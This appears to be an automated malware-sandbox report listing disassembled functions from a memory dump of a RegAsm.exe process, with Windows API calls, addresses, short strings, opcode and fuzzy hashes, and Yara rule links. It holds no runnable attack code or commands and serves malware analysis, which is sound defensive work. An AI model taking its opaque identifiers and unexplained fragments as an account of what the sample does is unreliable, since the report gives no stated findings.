                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                      • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                                                                      • Opcode ID: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                      • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                      Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                      Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                      Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
